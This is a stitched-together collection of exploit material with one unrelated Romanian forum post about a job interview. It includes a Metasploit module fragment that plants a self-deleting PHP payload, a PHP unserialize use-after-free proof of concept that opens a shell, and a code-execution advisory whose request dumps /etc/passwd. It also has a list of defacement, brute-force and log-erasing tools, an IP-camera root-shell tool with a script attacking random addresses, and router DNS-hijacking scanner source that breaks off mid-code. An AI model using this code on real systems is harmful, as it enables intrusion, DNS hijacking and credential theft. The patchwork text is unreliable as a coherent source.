'general_setup' => xml_payload } ) unless res && res.code == 200 fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end print_good("#{peer} - Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. print_status("#{peer} - Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>" errored = false begin res = send_request_cgi( 'uri' => normalize_uri(target_uri), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}", 'vars_post' => { param_id => Rex::Text.encode_base64(self_deleting_payload) } ) if res && res.code == 200 print_good("#{peer} - Stager execution succeeded, payload ready for execution.") else print_error("#{peer} - Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable print_error("#{peer} - Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. print_status("#{peer} - Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time }, 'vars_post' => { 'general_setup' => host_config } ) # Step 8 - invoke the installed payload, but only if all went to plan. unless errored print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}" ) end end # # Take a CodeIgnitor cookie and pull out the PHP object using the XOR # key that we've been given. # def decode_cookie(cookie_content) cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content)) pass = xor(cookie_value, datastore['XORKEY']) result = '' (0...pass.length).step(2).each do |i| result << (pass[i].ord ^ pass[i + 1].ord).chr end result end # # Take a serialised PHP object cookie value and encode it so that # CodeIgniter thinks it's legit. # def encode_cookie(cookie_value) rand = Rex::Text.sha1(rand_text_alphanumeric(40)) block = '' (0...cookie_value.length).each do |i| block << rand[i % rand.length] block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr end cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) vprint_status("#{peer} - Cookie value: #{cookie_value}") cookie_value end # # XOR a value against a key. The key is cycled. # def xor(string, key) result = '' string.bytes.zip(key.bytes.cycle).each do |s, k| result << (s ^ k) end result end # # Simple XML substitution because the target XML handler isn't really # full blown or smart. # def xml_encode(str) str.gsub(/</, '<').gsub(/>/, '>') end end

Ca tot am sa fiu si eu invitat maine la un interviu, m-am luat dupa @MrGrj si am creat si eu un off-topic ca sa-mi ridic moralu'. La ce as putea sa ma astept? Avand in vedere ca n-am primit niciun detaliu ... Mi s-a spus doar ca sa ma "pregatesc tehnic". Cerintele angajatorului: Job-ul e entry / middle. Vreau ca sa va spun ca n-am experienta intr-o echipa sau plm, nu sunt As la PHP - ii inteleg conceptul si cum functioneaza, dar nu ii stiu toate functiil si mi-e mai greu cu clasele. Deja e al 5-lea interviu si nu vreau sa-l ratez, pana la asta numa muie mi-am luat . Astia care activati in domeniu, spuneti-mi de unde sa o iau.

Caut pe cineva care se pricepe la PHP - HTML ! PM pentru a vorbi mai multe !

..

Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273] Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20 A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.6 Affected is PHP 5.5 < 5.5.22 Affected is PHP 5.4 < 5.4.38 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ static int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht) { zval *z_date; zval *z_timezone; zval *z_timezone_type; zval tmp_obj; timelib_tzinfo *tzi; php_timezone_obj *tzobj; z_date = zend_hash_str_find(myht, "date", sizeof("data")-1); if (z_date) { convert_to_string(z_date); z_timezone_type = zend_hash_str_find(myht, "timezone_type", sizeof("timezone_type")-1); if (z_timezone_type) { convert_to_long(z_timezone_type); z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1); if (z_timezone) { convert_to_string(z_timezone); ... static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC) { zval **z_timezone = NULL; zval **z_timezone_type = NULL; if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) { if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) { convert_to_long(*z_timezone_type); if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) { return SUCCESS; } } } return FAILURE; } The convert_to_long() leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. <?php $f = $argv[1]; $c = $argv[2]; $fakezval1 = ptr2str(0x100b83008); $fakezval1 .= ptr2str(0x8); $fakezval1 .= "\x00\x00\x00\x00"; $fakezval1 .= "\x06"; $fakezval1 .= "\x00"; $fakezval1 .= "\x00\x00"; $data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}'; $x = unserialize($data1); $y = $x[2]; // zend_eval_string()'s address $y[0][0] = "\x6d"; $y[0][1] = "\x1e"; $y[0][2] = "\x35"; $y[0][3] = "\x00"; $y[0][4] = "\x01"; $y[0][5] = "\x00"; $y[0][6] = "\x00"; $y[0][7] = "\x00"; $fakezval2 = ptr2str(0x3b296324286624); // $f($c); $fakezval2 .= ptr2str(0x100b83000); $fakezval2 .= "\x00\x00\x00\x00"; $fakezval2 .= "\x05"; $fakezval2 .= "\x00"; $fakezval2 .= "\x00\x00"; $data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}'; $z = unserialize($data2); function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?> Test the PoC on the command line, then any PHP code can be executed: $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)" Process 13472 launched: '/usr/bin/php' (x86_64) sh: no job control in this shell sh-3.2$ php -v PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies sh-3.2$ exit exit Process 13472 exited with status = 0 (0x00000000) (lldb) Source

-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 PHP Code Execution in jui_filter_rules Parsing Library ====================================================== Researcher: Timo Schmid <tschmid@ernw.de> Description =========== jui_filter_rules[1] is a jQuery plugin which allows users to generate a ruleset which could be used to filter datasets inside a web application. The plugin also provides a PHP library to turn the user submitted ruleset into SQL where statements for server side filtering. This PHP library contains a feature which allows to convert the submitted filter values with server side functions. These functions can be specified within the ruleset, which leads to an arbitrary PHP code execution. Exploitation Technique ====================== Remote Severity Level ============== Critical CVSS Base Score =============== 6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P) CVE-ID ====== <unassigned> Impact ====== By using the provided rule parsing library to generate SQL statements, an attacker is capable of executing arbitrary PHP code in the context of the web server. This could lead to a full compromise of the web server. The attack vector could be limited by existing validation mechanisms around the library, but this would require a partial manual parsing of the user supplied rules. Status ====== Reported Vulnerable Code Section ======================= server_side/php/jui_filter_rules.php: [...] private function create_filter_value_sql($filter_type, $operator_type, ... [...] if(is_array($filter_value_conversion_server_side)) { $function_name = $filter_value_conversion_server_side['function_name']; $args = $filter_value_conversion_server_side['args']; $arg_len = count($args); for($i = 0; $i < $vlen; $i++) { // create arguments values for this filter value $conversion_args = array(); for($a = 0; $a < $arg_len; $a++) { if(array_key_exists('filter_value', $args[$a])) { array_push($conversion_args, $a_values[$i]); } if(array_key_exists('value', $args[$a])) { array_push($conversion_args, $args[$a]['value']); } } // execute user function and assign return value to filter value try { $a_values[$i] = call_user_func_array($function_name, $conversion_args); } catch(Exception $e) { $this->last_error = array( 'element_rule_id' => $element_rule_id, 'error_message' => $e->getMessage() ); break; } } } [...] The provided PHP parsing library allows to specify a PHP function to convert the supplied filter value on the server side. This leads ultimatively to code execution through attacker supplied input. As no whitelist approach is used, any existing PHP function could be executed (including shell commands). Proof of Concept ================ Using the demo application from the git repository: Executing shell_exec('cat /etc/passwd') Request: POST /ajax_create_sql.dist.php HTTP/1.0 host: http://www.example.com X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 471 a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_ ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d ate Response: HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 02:12:33 GMT Server: Apache/2.2.22 (Debian) Content-Length: 530 Content-Type: text/html {"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin COSMOS:/root:/ bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"} Solution ======== This functionality should generally be removed or replaced by a mapping/ whitelist approach and strict type filtering to prevent arbitrary code execution. Affected Versions ================= >= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b < 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1) Timeline ======== 2015-01-12: Vulnerability found 2015-01-13: Developer informed 2015-02-14: Fixed in version 1.0.6 (git 0b61463cd02cc1814046b516242779b29ba7d1e1) References ========== [1] http://www.pontikis.net/labs/jui_filter_rules [2] https://www.owasp.org/index.php/Code_Injection [3] https://www.ernw.de/download/BC-1501.txt [4] https://bufferoverflow.eu/BC-1501.txt Advisory-ID =========== BC-1501 Disclaimer ========== The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/ distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. - -- Timo Schmid ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192 PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0 Handelsregister Mannheim: HRB 337135 Geschaeftsfuehrer: Enno Rey ============================================================== || Blog: www.insinuator.net | | Conference: www.troopers.de || ============================================================== ================== TROOPERS15 ================== * International IT Security Conference & Workshops * 16th - 20st March 2015 / Heidelberg, Germany * www.troopers.de ==================================================== -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds= =tnwW -----END PGP SIGNATURE----- Source

[+] AnonGhost PHP Shell [+] https://ghostbin.com/paste/9ckp3dst [+] Bypass Root Path With Zip File [+] https://ghostbin.com/paste/tdbvr2ug [+] Bypass Forbidden with Python via TCP Protocol [+] https://ghostbin.com/paste/qbrs9r8a [+] Wordpress 0day CSRF + Brute Token [+] https://ghostbin.com/paste/znxkcojv [+] Wordpress Index Hijack [+] https://ghostbin.com/paste/8wf2yj2v [+] CPanel & FTP Auto Defacer [+] https://ghostbin.com/paste/z6jfwrbm [+] Reverse IP Lookup [+] https://ghostbin.com/paste/kaa5na3x [+] Logs Eraser [+] https://ghostbin.com/paste/w9puv3kq [+] Facebook Multi-Account Bruteforce [+] https://ghostbin.com/paste/akn9adf8 [+] Bypass SafeMode [+] https://ghostbin.com/paste/j423dffz [+] Skype BruteForce [+] https://ghostbin.com/paste/r85xqq28 [+] Virtual Bypass Via Error_Log [+] https://ghostbin.com/paste/qjb2shhu [+] Shtml Bypass Symlink Via Error [+] https://ghostbin.com/paste/orqjsu6e [+] Bypass Users Server [+] https://ghostbin.com/paste/koew333z [+] Cpanel Mass Defacer [+] https://ghostbin.com/paste/nt3zc43b [+] Bypass Chmod Directory [+] https://ghostbin.com/paste/2q6vjea3 [+] Bypass Root Path [+] https://ghostbin.com/paste/y8jx2hfs [+] Wordpress Add Admin User [+] https://ghostbin.com/paste/ffqvakw8 [+] Server Informations [+] https://ghostbin.com/paste/om32c59z [+] Twitter Multi-Account Brute force [+] https://ghostbin.com/paste/hsmbtep8 [+] Symlink Bypass [+] https://ghostbin.com/paste/ywv75o46 [+] Bypass /etc/passwd [+] https://ghostbin.com/paste/6nuom97j Password: ./d3f4ult_v1rUsa

Requirements PHP 5 A distribution of Linux. I haven’t and won’t test this on Windows. IP Cam Shell Usage Using IPCS is pretty straight forward. You pass the URL to ipcs.php via the -u option. $ php ipcs.php -u http://192.168.0.3:8080 If the camera is vulnerable you’ll be dropped in to a “shell” as root and be able to exploit the camera further. $ php ipcs.php -u http://192.168.0.3:8080 Those who do not understand UNIX are condemned to reinvent it, poorly. — Henry Spencer ipcamshell> It’s very much like being logged in to a stripped down Unix server as root. ipcamshell> whoami root ipcamshell> id uid=0(root) gid=0(root) ipcamshell> ls / bin dev etc lib linuxrc mnt opt proc sbin scripts tmp usr var ipcamshell> cat /etc/passwd root:x:0:0:Linux User,,,:/:/bin/sh Use quit, exit, or ^C to exit. Further Attacks Of course it wouldn’t be very fun without the ability to login and view the camera… ipcamshell> getadminpass Username: admin Password: hunter2 If you wish to kill the web server (to prevent someone from accessing the web interface temporarily), run the killswitch command. Note that the camera will continue to record regardless of this. Shutting the server down might switch the camera off, although that’s complete speculation. If the camera isn’t vulnerable, the server isn’t up, or the internet hates you, you’ll recieve the following message: Sorry, the server specified isn't vulnerable. Automation IPCS has the potential to be automated in different ways. This, I’m going to leave to you. The -coption won’t drop you in to a shell after successfully exploiting a server, and the -g option surpresses the “Sorry, the server specified isn’t vulnerable.” messages for failed attempts. As an example, the following bash script will forever try to attack randomly generated IPv4 addresses. #!/bin/bash while true; do export ip=$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)) && echo "Trying $ip..." && php ipcs.php -c 1 -g 1 -u http://$ip; done; This is slow, and will likely yield nothing without extremely good luck. Use your imagination. Download https://github.com/SintheticLabs/ipcamshell

Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Readme: # RouterHunterBR TOOL - Unauthenticated Remote DNS , Scanner ranger IP. * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/ - Description: ------ The script explores three vulnerabilities in routers * 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ * 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ * 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ - Execute: ------ ``` Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ``` - Dependencies: ------ ``` sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ``` - EDITING TO ADD NEW EXPLOITS GETS: ------ ``` TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; #DEFINITION OF EXPLOITS line 92: $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; line 93: $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; line 94: $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; ``` Download: <?php/* * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS change/ users & passwords * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/'>http://packetstormsecurity.com/user/googleinurl/ ---------------------------------------------------------- * Description:* The script explores two vulnerabilities in routers 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ ---------------------------------------------------------- * Execute* Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ---------------------------------------------------------- * Dependencies* sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ---------------------------------------------------------- *Update* https://github.com/googleinurl/RouterHunterBR ---------------------------------------------------------- */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); (!isset($_SESSION) ? session_start() : NULL); $_SESSION["cont_ip"] = 0; //SETANDO CORES TERMINAL $_SESSION["c00"] = "\033[0m"; // COLOR END $_SESSION["c01"] = "\033[1;37m"; // WHITE $_SESSION["c02"] = "\033[1;33m"; // YELLOW $_SESSION["c13"] = "\033[02;31m"; // DARK RED $_SESSION["c05"] = "\033[1;32m"; // GREEN LIGHT $_SESSION["c07"] = "\033[1;30m"; // DARK GREY $command = getopt('h::', array('dns1:', 'dns2:', 'file:', 'proxy:', 'output:', 'limit-ip:', 'range:', 'rand::', 'help::', 'ajuda::')); //VERIFYING LIB php5-curl IS INSTALLED. (!function_exists('curl_exec') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c00"]}\n")) : NULL ); (!defined('STDIN') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}Please run it through command-line!{$_SESSION["c00"]}\n")) : NULL); empty($command) ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}DEFINE THE USE OF ARGUMENTS{$_SESSION["c00"]}\n")) : NULL; (isset($opcoes['h']) || isset($command['help']) || isset($command['ajuda']) ? __banner(NULL) : NULL); #=============================================================================== ########################## CONFIGURATION SCRITPT ############################### #=============================================================================== $params['dns1'] = not_isnull_empty($command['dns1']) ? $command['dns1'] : NULL; $params['dns2'] = not_isnull_empty($command['dns2']) ? $command['dns2'] : NULL; /* TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; */ #DEFINITION OF EXPLOITS $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; !not_isnull_empty($params['dns2']) && !not_isnull_empty($params['dns2']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE DNS1 and DNS2 ex: --dns1 '0.0.0.0.0' --dns2 '0.0.0.0.0'{$_SESSION["c00"]}\n") : NULL; $params['file_output'] = not_isnull_empty($command['output']) ? $command['output'] : __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE FILE SAVE OUTPUT ex: --output saves.txt{$_SESSION["c00"]}\n"); $params['file'] = not_isnull_empty($command['file']) ? __getIPFile($command['file']) : NULL; $params['rand'] = isset($command['rand']) ? TRUE : NULL; $params['limit-ip'] = not_isnull_empty($command['limit-ip']) ? $command['limit-ip'] : NULL; $params['proxy'] = not_isnull_empty($command['proxy']) ? $command['proxy'] : NULL; $params['range'] = not_isnull_empty($command['range']) ? __getRange($command['range']) : NULL; $params['op'] = NULL; $params['op'] = not_isnull_empty($params['range']) && !($params['rand']) && !not_isnull_empty($params['file']) ? 0 : $params['op']; $params['op'] = ($params['rand']) && !not_isnull_empty($params['range']) && !not_isnull_empty($params['file']) ? 1 : $params['op']; $params['op'] = not_isnull_empty($params['file']) && !($params['rand']) && !not_isnull_empty($params['range']) ? 2 : $params['op']; $params['line'] = "-------------------------------------------------------------\n"; #=============================================================================== function __plus() { ob_flush(); flush(); } //FILTRE USER PASS LG_DVR_LE6016D function __getUserPass($html) { $set = array(); $set['reg1'] = '/<name>(.*?)<\/name>/i'; $set['reg2'] = '/<pw>(.*?)<\/pw>/i'; if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) { preg_match_all($set['reg1'], $html, $set['user']); preg_match_all($set['reg2'], $html, $set['pass']); for ($i = 0; $i <= count($set['user']); $i++) { $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n"; } return $set['out']; } return FALSE; } //INFORMATION IP function __infoIP($ip) { __plus(); $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE); return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}"; } //VALIDATION VARIABLE function not_isnull_empty($value = NULL) { RETURN !is_null($value) && !empty($value) ? TRUE : FALSE; } //MENU BANNER function __banner($msg, $op = NULL) { system("command clear"); print_r(" \n{$_SESSION["c01"]} _____ {$_SESSION["c01"]} (_____) {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) {$_SESSION["c01"]} \ / {$_SESSION["c01"]} \ / {$_SESSION["c01"]} /=\ {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); (is_null($op)) ? exit() : NULL; } //CREATING FORMATTING IPS FOR BAND function __getRange($range) { $ip = explode('.', $range); if (is_array($ip) && count($ip) == 4) { $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); $ip[3] = 